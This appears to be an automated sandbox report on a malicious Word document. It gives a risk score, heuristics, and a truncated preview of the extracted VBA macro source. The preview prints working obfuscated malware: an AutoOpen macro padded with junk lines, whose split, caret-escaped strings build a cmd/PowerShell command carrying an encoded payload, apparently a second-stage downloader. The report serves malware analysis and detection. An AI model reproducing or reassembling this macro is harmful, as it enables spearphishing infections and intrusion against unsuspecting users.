MALICIOUS
82
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
The sample is a Word document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The macro attempts to construct and execute a PowerShell command, likely to download and run a second-stage payload. The constructed command is 'Md /v:^ ^ ^ /r S^ET ^ ^ "^ " ^ "UZnV=p^ow^`rs`hll^ ;^` " ^JAB^OA^H^I^A^T^AA^9^A/^Q^B'AC^0^Ab^w^B^.A^G^UA^dA^A^u^A^Fc^A/^Q^B^.^A^E^M^A^b^ABpAG^UA^bgB^0^AD^s^A^J^A^B^BA^HAAc^Q^A9^"'. This suggests a typical macro-based initial access vector via spearphishing.
Heuristics 4
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 36606 bytes |
SHA-256: 3ce89ccb0922dfe23a802a578af282fb7fc07a5a506d8f6c41cf0daa9e49c078 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ASAnCpNTT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "hiaXrvZhVhqMVJ"
Function XMQOOPAL()
On Error Resume Next
HbmZk = 88455 + hdWtV
HbmZk = Second(qajWG)
VarType CStr(446458898)
IsArray Sqr(91856 / zijUst * iwPkz / NiuENI)
IsArray 32018 * 64458 / 62173 * NRSjhr
VarType CStr(14)
bajicOMD = "Md /" + "v" + ":^ ^ ^" + " /r" + " " + CStr(Chr(AajGjwkof + zltQTRmfzifdz + 34 + ouKQwCXMlHlO + zXhZjAjkvG)) + " S^" + "ET " + " ^ "
VarType muAZXo + ruFCu
IsArray CStr(pSsdww)
VarType Str(447804539)
VarType Cos(252)
IsArray Month(cibuv)
tPjiC = " ^ " + "UZnV=" + "p^ow^" + "`rs" + "h`ll" + "^ ;^` "
HbmZk = LCase(ltajti * 80761)
IsArray CDate(zzwtM)
VarType Rnd(66923 / Wbdwn + 76957 - tOwJP)
YOpTU = "^JAB" + "^OA" + "H^I^A" + "T^" + "AA" + "^9" + "A^G^" + "4^A/^Q" + "^B'AC" + "^0" + "^Ab^w^B" + "^.A^G^"
IsArray CDate(iGJjDM)
VarType CDate(255830362)
VarType Str(44)
SKHLKDIj = "o^A/" + "Q" + "B(" + "^AH^Q" + "^A" + "IABO^" + "A^G" + "^UA" + "dA^A" + "u^A^Fc" + "A" + "/^Q" + "B^.^A^E"
VarType Rnd(4)
IsArray CYmVI * 42592
HbmZk = 93195 * VZfrn
HbmZk = hwHMFs / XnGkKz * wABorc * 45743
TbbSMfH = "^" + "M^A^b" + "ABpAG" + "^UA^" + "bgB^" + "0" + "^AD^s^" + "A" + "^J^A" + "^B^BA" + "^HAAc^Q" + "A9" + "^"
XMQOOPAL = bajicOMD + tPjiC + YOpTU + SKHLKDIj + TbbSMfH
IsArray Val(15)
IsArray CStr(23)
IsArray Log(uaJTnY)
VarType 98837 - GCBqT
End Function
Function wfhzSmJL()
On Error Resume Next
HbmZk = Month(85559 * CNEbcm)
IsArray 58939 / YQuiN + 21147 * 34620
HbmZk = LCase(272)
IsArray ziDjw - 40010
IsArray Int(1449 - XAWYRW)
IsArray Int(636)
immusD = "AC" + "c^A^a" + "AB0AH" + "Q" + "AcAA^6^" + "AC8^AL" + "w^B(AG8" + "A^bgB^" + "kA" + "^Gk" + "A^"
HbmZk = Rnd(jhTFCQ)
IsArray CDate(36829 * GICsc / cUSDW / 62313)
IsArray 79301 * UnfBr * 94741 - CzdGGm
HbmZk = TXfid + RVJZf + 29913 / Iksus
GAkhbwazvd = "`^gB^l" + "^AH" + "^IA^L^g" + "^B(^A^G" + "8" + "A^b" + "^Q^A7" + "AH" + "Q^" + "Ac^"
HbmZk = 91345 / YwiHL * 21554 - oaMZzK
IsArray 51918 * 15079
qwkMpZBr = "wB" + "0AC8^" + "Aa^QBuA" + "^G" + "Q" + "A/" + "QB" + "^4AC^4" + "A" + "c^A" + "^B"
IsArray kzdMN - TkZJif
IsArray Round(KzivV)
JjjpjaIwMj = "o^A" + "^H" + "^AA_" + "^w^Bs^" + "A^D^0A" + "cwB" + "7^AG^g^" + "Abw" + "A5^" + "A" + "C4Ad^A^" + "BrA" + "^G4"
VarType CBool(6872)
VarType Tan(wTqZw)
ProiORISwJw = "^A^JwA" + "u" + "A" + "^FMAc^A" + "B" + "^" + "sA^G^kA" + "dA^A^" + "o" + "^ACcAQ" + "A" + "^"
HbmZk = Log(jujKJu)
HbmZk = raJfv + jrzisL
HbmZk = Tan(2)
HbmZk = zwdis - PViHW
HbmZk = MvBFwa + KfdqC
NHtwKCtXr = "An^AC^" + "kAOwA^" + "kAH^MA" + "[QB^" + "uACA^A" + "_" + "Q" + "^AgACcA" + "MQ^A1^A" + "DAA" + "J" + "wA^#"
HbmZk = CCur(wSZaqq)
IsArray CDate(84312 + IwuTw)
IsArray Fix(fPrwD)
IsArray CByte(8005)
VUpAswR = "A" + "C^" + "Q^A^SA^" + "B^K^A^" + "G^k^A^_" + "^Q^A^k" + "A^" + "GUA"
wfhzSmJL = immusD + GAkhbwazvd + qwkMpZBr + JjjpjaIwMj + ProiORISwJw + NHtwKCtXr + VUpAswR
HbmZk = 71892 * tRVnbF + iXPhv / 12786
IsArray 56790 + 67117 - pHczo * ahEspl
End Function
Function zwlScioYLa()
On Error Resume Next
VarType pDzSrr - lkUwbU - rAqNc - 78148
IsArray nEcuG + MYzWb - 1988 - DwLrd
uqTihcErAWw = "^b" + "^g^B" + "^2^A" + "^D^o^Ac" + "^A" + "B^1" + "^AGIA" + "bAB^p^A" + "GMA" + "KwAnA" + "Fw^" + "AJ^w" + "^Ar"
VarType 84047 - qMGUNs
IsArray AvjQt / zlQZMX / 52924 + 1687
VarType Atn(124030663)
cwRzZWiPWa = "^AC^Q^" + "Acw^B^h" + "A^G4" + "A" + "KwAnAC" + "^4^A/" + "^" + "Q^B^4A" + "^G^" + "UA^J" + "^wA#" + "AG^[A^b" + "^wB^"
VarType 77841 * 6818 / VwnORI + 26292
VarType Sqr(lJTYZz * FanDWu / kzfHOL + 75938)
UMQhmt = "5^A^G^" + "UA^[^Q" + "^B" + "(A" + "G^gA^" + "K^" + "A^Ak" + "^AE^MA"
HbmZk = 78891 - 38964 * 2778 - NjOHf
VarTyp
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.